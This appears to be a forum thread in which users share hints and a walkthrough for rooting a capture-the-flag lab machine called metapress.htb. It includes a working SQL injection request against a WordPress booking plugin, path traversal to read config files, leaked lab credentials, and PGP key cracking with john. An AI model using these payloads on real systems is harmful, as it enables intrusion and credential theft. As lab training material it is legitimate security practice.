(October 29, 2022, 08:47 PM)chamo20 Wrote:

(October 29, 2022, 08:41 PM)mesutyldrm Wrote:

(October 29, 2022, 08:36 PM)chamo20 Wrote: [php]<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'blog' );

/** MySQL database username */
define( 'DB_USER', 'blog' );

/** MySQL database password */
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

/**#@+
* Authentication Unique Keys and Salts.
* @since 2.6.0
*/
define( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
define( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );

/**
* WordPress Database Table prefix.
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
[/php]

how did you find this sir? I tried /var/www/html/wp-config.php , /var/www/metapress.htb/wp-config.php and /var/www/metapress/wp-config.php but, didn't work

As it was an nginx server I first read /etc/nginx/sites-enabled/default and in its content it had the root path /var/www/metapress.htb/blog 

how did you read that?

nice one thanks

(October 29, 2022, 09:36 PM)may123a Wrote:

(October 29, 2022, 09:34 PM)puuuuuuuuuuuullo Wrote: What to do next  after decrypting the key and getting the pass, i'm not able to ssh as root

How do you solve the problem: you can't find the PGP armor?

Use this to extract pkey:

tail -n -$(awk '/BEGIN PGP PRIVATE/{ print NR+2; exit}' ~/.passpie/.keys) ~/.passpie/.keys >  private.key

Or do it manually.

---

(October 29, 2022, 09:34 PM)puuuuuuuuuuuullo Wrote: What to do next  after decrypting the key and getting the pass, i'm not able to ssh as root

su -

rooted it! thanks for all hints guys! I think this is a very nice machine!

(October 29, 2022, 09:15 PM)tmpuser123 Wrote: for web config you can find it by doing ../wp-config.php also

yes, also read this writeup: https://classroom.anir0y.in/post/tryhackme-wordpresscve202129447/

(October 29, 2022, 06:56 PM)11231123 Wrote: Good luck everyone!

thx

(October 29, 2022, 09:08 PM)loge23 Wrote:

(October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?


comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----


  hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2

  nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km

  yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED

  /2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf

  iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg

  krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw

  mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr

  lpF0RatbxQGWBks5F3o=

  =uh1B

  -----END PGP ME

declare -i line=`grep PRIVATE .passpie/.keys -m1 -n|cut -f1 -d:`

passpie copy ssh --to stdout

Thank

I am going to put the steps here:

1) SQLi via plugin

wpscan --enumerate vp --plugins-detection aggressive

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 224
Origin: http://metapress.htb
Connection: close
Referer: http://metapress.htb/events/
Cookie: PHPSESSID=74pk14hrurabal16gtg4cm2vej

action=bookingpress_front_get_category_services&_wpnonce=5a815c3989&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login),group_concat(user_pass),@@version_compile_os,1,2,3,4,5,6 from wp_users-- -

The wpnonce must be changed and can be found in the response to /events.

Crack the hashes obtained

2) Login as manager

Escalate using: https://www.youtube.com/watch?v=tE8Smz1Jvb8
https://tryhackme.com/room/wordpresscve202129447

Note that since it is a wordpress site you must use as file; ../WP_FILE.php 

I read the ../wp-config.php

To decode the base64 refer to the tryhackme room.

3)  wp-config.php leaks the FTP creds

4) connect to the FTP

5) retrieve send_email.php from the FTP server

6) this contains the user cred

7) linpeas.sh will show you that there is a weird hidden folder in the home of the user

8) cat /home/jnelson/.passpie/.keys

9) copy the private key in a file on your kali machine, 
gpg2john private key > hash
john --wordlist=rockyou.txt hash

10) /home/jnelson/.passpie/ssh will contain the passwords of the user and root in a pgp encrypted message

11) copy contents of root.pass in the ssh folder to the /tmp folder, i named it root2.pass
The command "passpie export root2.pass" in the /tmp folder; enter the password you cracked with john

12) cat the root2.pass, you will get the password

(October 29, 2022, 09:08 PM)loge23 Wrote:

(October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?


comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----


  hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2

  nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km

  yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED

  /2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf

  iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg

  krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw

  mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr

  lpF0RatbxQGWBks5F3o=

  =uh1B

  -----END PGP ME

declare -i line=`grep PRIVATE .passpie/.keys -m1 -n|cut -f1 -d:`

passpie copy ssh --to stdout

ty

(October 29, 2022, 09:08 PM)loge23 Wrote:

(October 29, 2022, 08:58 PM)u53r Wrote: Any idea about how to decrypt it?


comment: ''
fullname: root@ssh
login: root
modified: 2022-06-26 08:58:15.621572
name: ssh
password: '-----BEGIN PGP MESSAGE-----


  hQEOA6I+wl+LXYMaEAP/T8AlYP9z05SEST+Wjz7+IB92uDPM1RktAsVoBtd3jhr2

  nAfK00HJ/hMzSrm4hDd8JyoLZsEGYphvuKBfLUFSxFY2rjW0R3ggZoaI1lwiy/Km

  yG2DF3W+jy8qdzqhIK/15zX5RUOA5MGmRjuxdco/0xWvmfzwRq9HgDxOJ7q1J2ED

  /2GI+i+Gl+Hp4LKHLv5mMmH5TZyKbgbOL6TtKfwyxRcZk8K2xl96c3ZGknZ4a0Gf

  iMuXooTuFeyHd9aRnNHRV9AQB2Vlg8agp3tbUV+8y7szGHkEqFghOU18TeEDfdRg

  krndoGVhaMNm1OFek5i1bSsET/L4p4yqIwNODldTh7iB0ksB/8PHPURMNuGqmeKw

  mboS7xLImNIVyRLwV80T0HQ+LegRXn1jNnx6XIjOZRo08kiqzV2NaGGlpOlNr3Sr

  lpF0RatbxQGWBks5F3o=

  =uh1B

  -----END PGP ME

declare -i line=`grep PRIVATE .passpie/.keys -m1 -n|cut -f1 -d:`

passpie copy ssh --to stdout

great